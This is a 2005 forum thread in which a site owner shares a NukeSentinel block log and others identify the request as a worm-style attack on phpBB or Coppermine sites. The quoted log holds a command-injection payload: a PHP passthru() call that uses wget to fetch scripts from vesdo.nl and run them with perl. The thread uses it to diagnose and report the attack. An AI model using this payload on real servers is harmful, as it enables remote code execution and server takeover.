Yahoo Slurp - getting too many of these lately

Involved Joined: Dec 28, 2003 Posts: 276 Location: Israel

I'm getting too many of these lately.
A. Is this ok?
B. If so, is there any way I can make Sentinel avoide it?

TIA!

=================================

Date & Time: 2005-12-18 12:52:49 EST GMT -0500
Blocked IP: 68.142.250.146
User ID: guest (1)
Reason: Abuse-Script
--------------------
User Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; [ Only registered users can see links on this board! Get registered or login! ]
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Get String: [ Only registered users can see links on this board! Get registered or login! ] _START_; CD/VAR/TMP;WGETWWW.VESDO.NL/CACHE/FRAME3.TXT;WGETWWW.VESDO.NL/CACHE/FRAME2.TXT;PERLFRAME3.TXT;RMFRAME3.TXT;PERLFRAME2.TXT;RMFRAME2.TXT; ECHO _END_&HIGHLIGHT='.PASSTHRU($HTTP_GET_VARS[RUSH]).'
Post String: [ Only registered users can see links on this board! Get registered or login! ]
Forwarded For: none
Client IP: none
Remote Address: 68.142.250.146
Remote Port: 34165
Request Method: GET

Sells PC To Pay For Divorce Joined: Posts: 5661

well,to what i could find about it that it is an attack ,but because of the variety of types it couldnt point out the exact one.....im not sure.but it uses another site like vesdo..
It addresses the mailserver,phpbb,or even coppermine.
But a reply i found said also..."Looks like a variant of the santy worm to me, that also used LWP::Simple"

And that had the same contents of what you posted... Sad

Posted: Mon Dec 19, 2005 8:53 am

Gee, you got me now hitwalker!
I was certain that's not an attack! gee...

Well, if NukeSentinel recognize it, do I have anything to fear from?

Posted: Mon Dec 19, 2005 9:08 am

well dont take my word completely,i searched over and over with google using full lines of your post...
one thing is certain and that its described as an attach of gaining......whatever access to whatever...
Im not gonna post anything by making things up....
also a thing to keep in mind is that a lot of sites were abused remotely because some things on their server were vunerable.
but the abusive links to be used for other hackers are spread around but never "updated".
The site abused for whatever reason is vesdo.nl,and your attack lines are targeted for sites using phpbb,coppermine etc....and vesdo is a mambo cms site,and could easely be an old abused address still available in the search engines.
The combining urls you see with vesdo dont excist.
As you said..sentinel stopped it so no worries...

Posted: Mon Dec 19, 2005 11:54 pm

Yes, it is a cross-site scripting attack. WGet is a command to get something from the other server.. in this case at the vesdo.nl address. You'd probably find some nasty code in there to further compromise your system.

What I don't understand is that this IP is coming from Yahoo's Inktomi search engine. So someone is trying to hide their current IP probably.

You may need to contact the vesdo.nl server admins too, to see if you can get things removed from their server

Posted: Tue Dec 20, 2005 1:58 am

Evaders99, thank you.
I've addressed vesdo.nl's site owner/manager and added a link to this thread. maybe he'll want to explain something to us...

Posted: Tue Dec 20, 2005 5:51 am

well i already did leave a message on his answering machine and maild him,no sign of life yet....
how greatfull some people are... Evil or Very Mad

Posted: Tue Dec 20, 2005 8:59 am

hitwalker, is there anything we can do without him?
Should we address Yahoo! as well?

Posted: Tue Dec 20, 2005 9:13 am

No...
I already had a phonecall with the owner of the dutch site an hour ago.. Smile

.
He will be contacting his host to see if they can look into this as well.
They can check more then we can,its interesting to see what it is exactly and why his domain is used.
But i know a litle bit what the attackers intention was.
they wanted to use the cache of mambo.
If you look at the url you see its written like ..CACHE,well that doesnt excist.
But cache...does,thats simply from mambo itself....and something that can be turned on or off.

But mailing yahoo is realy useless..that company is born deaf and blind..

Posted: Tue Dec 20, 2005 9:29 am

hitwalker wrote:

But i know a litle bit what the attackers intention was.
they wanted to use the cache of mambo.
If you look at the url you see its written like ..CACHE,well that doesnt excist.

What were they trying to do to my site? can you tell?

Posted: Tue Dec 20, 2005 9:40 am

well only thing we know is that the commands they used are to get access..
But what exactly is hard to say but it comes to this....script kiddies build something that uses wget on the server side to download an IRC bot or rootkit.
wget will be called by passing it's name among a URL and probably some compiler, tar, mkdir, .. commands to an exploitable script on your server.
then you find wget in the query strings in your log files.

a litle bit of info i gathered..
but ill reply here again as i get a response again from that guy's website.

Posted: Wed Dec 21, 2005 12:13 am

Thanks for everything, hitwalker...

Posted: Wed Dec 21, 2005 2:49 pm

well he got a reply and maild it but unfortunately with not that much info.
The detected a few things as well but didnt tell exactly what...,they did told him not to use the cache anymore...so thats it..

Posted: Wed Dec 21, 2005 2:58 pm

Hmmm... dissapointing.. Sad